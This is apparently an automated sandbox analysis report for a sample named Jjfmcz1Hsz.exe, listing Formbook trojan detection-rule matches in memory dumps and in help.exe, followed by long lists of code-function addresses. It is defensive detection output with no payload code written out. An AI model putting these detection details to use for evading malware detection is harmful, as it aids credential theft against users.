      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: Jjfmcz1Hsz.exe PID: 2000, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: Process Memory Space: help.exe PID: 3568, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004030D9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeFile created: C:\Windows\resources\0409Jump to behavior
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0040488F2_2_0040488F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_004063442_2_00406344
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03340D522_2_03340D52
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03329B302_2_03329B30
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03342B3B2_2_03342B3B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321F2B2_2_03321F2B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332330F2_2_0332330F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03345B7E2_2_03345B7E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03329B4A2_2_03329B4A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332834D2_2_0332834D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321FA02_2_03321FA0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321F992_2_03321F99
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033233832_2_03323383
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033413862_2_03341386
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03343E112_2_03343E11
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033222552_2_03322255
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03328A492_2_03328A49
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321EB32_2_03321EB3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03340EE52_2_03340EE5
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03342D2F2_2_03342D2F
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03325D032_2_03325D03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0334250C2_2_0334250C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03329D7C2_2_03329D7C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0334557B2_2_0334557B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332C96A2_2_0332C96A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0334415C2_2_0334415C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332899A2_2_0332899A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321DE42_2_03321DE4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03321DD72_2_03321DD7
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033221D72_2_033221D7
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033220202_2_03322020
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0334342C2_2_0334342C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03329C032_2_03329C03
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_0332906B2_2_0332906B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033294BA2_2_033294BA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033298922_2_03329892
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033270912_2_03327091
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_03329C882_2_03329C88
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_033220FC2_2_033220FC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D842DB011_2_1D842DB0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D839DD011_2_1D839DD0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CFDF411_2_1D8CFDF4
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82AD0011_2_1D82AD00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EFD2711_2_1D8EFD27
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E7D4C11_2_1D8E7D4C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830D6911_2_1D830D69
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8C9C9811_2_1D8C9C98
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D848CDF11_2_1D848CDF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84FCE011_2_1D84FCE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8FACEB11_2_1D8FACEB
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D820C1211_2_1D820C12
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83AC2011_2_1D83AC20
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DEC4C11_2_1D8DEC4C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D833C6011_2_1D833C60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E6C6911_2_1D8E6C69
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EEC6011_2_1D8EEC60
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EEFBF11_2_1D8EEFBF
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E1FC611_2_1D8E1FC6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D836FE011_2_1D836FE0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83CF0011_2_1D83CF00
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EFF6311_2_1D8EFF63
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E0EAD11_2_1D8E0EAD
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D831EB211_2_1D831EB2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E9ED211_2_1D8E9ED2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D822EE811_2_1D822EE8
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D872E4811_2_1D872E48
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D850E5011_2_1D850E50
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D0E6D11_2_1D8D0E6D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82E9A011_2_1D82E9A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EE9A611_2_1D8EE9A6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8759C011_2_1D8759C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84688211_2_1D846882
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A98B211_2_1D8A98B2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8328C011_2_1D8328C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E18DA11_2_1D8E18DA
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E78F311_2_1D8E78F3
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83380011_2_1D833800
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85E81011_2_1D85E810
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8D083511_2_1D8D0835
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81686811_2_1D816868
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83987011_2_1D839870
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84B87011_2_1D84B870
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EF87211_2_1D8EF872
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A4BC011_2_1D8A4BC0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D830B1011_2_1D830B10
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D86DB1911_2_1D86DB19
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EFB2E11_2_1D8EFB2E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EFA8911_2_1D8EFA89
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84FAA011_2_1D84FAA0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8ECA1311_2_1D8ECA13
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EEA5B11_2_1D8EEA5B
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EF5C911_2_1D8EF5C9
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E75C611_2_1D8E75C6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8FA52611_2_1D8FA526
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D89D48011_2_1D89D480
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83044511_2_1D830445
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E675711_2_1D8E6757
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83276011_2_1D832760
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83A76011_2_1D83A760
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83068011_2_1D830680
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EA6C011_2_1D8EA6C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82C6E011_2_1D82C6E0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8A36EC11_2_1D8A36EC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EF6F611_2_1D8EF6F6
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84C60011_2_1D84C600
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CD62C11_2_1D8CD62C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DD64611_2_1D8DD646
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D85467011_2_1D854670
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8351C011_2_1D8351C0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D84B1E011_2_1D84B1E0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8F010E11_2_1D8F010E
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81F11311_2_1D81F113
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8CD13011_2_1D8CD130
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D87717A11_2_1D87717A
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D86508C11_2_1D86508C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8200A011_2_1D8200A0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83B0D011_2_1D83B0D0
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E70F111_2_1D8E70F1
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8DE07611_2_1D8DE076
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D82138011_2_1D821380
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D83E31011_2_1D83E310
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8EF33011_2_1D8EF330
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D81D2EC11_2_1D81D2EC
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_1D8E124C11_2_1D8E124C
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_0167E05711_2_0167E057
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_0168402D11_2_0168402D
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 11_2_016841D311_2_016841D3
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0394138019_2_03941380
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395E31019_2_0395E310
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0F33019_2_03A0F330
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0393D2EC19_2_0393D2EC
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0124C19_2_03A0124C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039551C019_2_039551C0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396B1E019_2_0396B1E0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0393F11319_2_0393F113
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039ED13019_2_039ED130
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A1010E19_2_03A1010E
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0399717A19_2_0399717A
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0398508C19_2_0398508C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039400A019_2_039400A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395B0D019_2_0395B0D0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A070F119_2_03A070F1
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039FE07619_2_039FE076
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395276019_2_03952760
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395A76019_2_0395A760
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0675719_2_03A06757
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395068019_2_03950680
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0F6F619_2_03A0F6F6
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0A6C019_2_03A0A6C0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039C36EC19_2_039C36EC
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0394C6E019_2_0394C6E0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396C60019_2_0396C600
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039ED62C19_2_039ED62C
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039FD64619_2_039FD646
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0397467019_2_03974670
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A075C619_2_03A075C6
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0F5C919_2_03A0F5C9
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A1A52619_2_03A1A526
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039BD48019_2_039BD480
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395044519_2_03950445
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039C4BC019_2_039C4BC0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0398DB1919_2_0398DB19
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03950B1019_2_03950B10
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0FB2E19_2_03A0FB2E
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0FA8919_2_03A0FA89
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396FAA019_2_0396FAA0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0CA1319_2_03A0CA13
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0EA5B19_2_03A0EA5B
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0E9A619_2_03A0E9A6
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0394E9A019_2_0394E9A0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039959C019_2_039959C0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396688219_2_03966882
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039C98B219_2_039C98B2
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A078F319_2_03A078F3
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039528C019_2_039528C0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A018DA19_2_03A018DA
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0397E81019_2_0397E810
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395380019_2_03953800
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039F083519_2_039F0835
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0F87219_2_03A0F872
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395987019_2_03959870
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0396B87019_2_0396B870
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039C587019_2_039C5870
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0393686819_2_03936868
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0EFBF19_2_03A0EFBF
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A01FC619_2_03A01FC6
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03956FE019_2_03956FE0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0395CF0019_2_0395CF00
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0FF6319_2_03A0FF63
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A00EAD19_2_03A00EAD
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03951EB219_2_03951EB2
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A09ED219_2_03A09ED2
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03942EE819_2_03942EE8
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03970E5019_2_03970E50
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03992E4819_2_03992E48
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039F0E6D19_2_039F0E6D
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03962DB019_2_03962DB0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03959DD019_2_03959DD0
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_039EFDF419_2_039EFDF4
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_03A0FD2719_2_03A0FD27
      Source: C:\Windows\SysWOW64\help.exeCode function: 19_2_0394AD0019_2_0394AD00
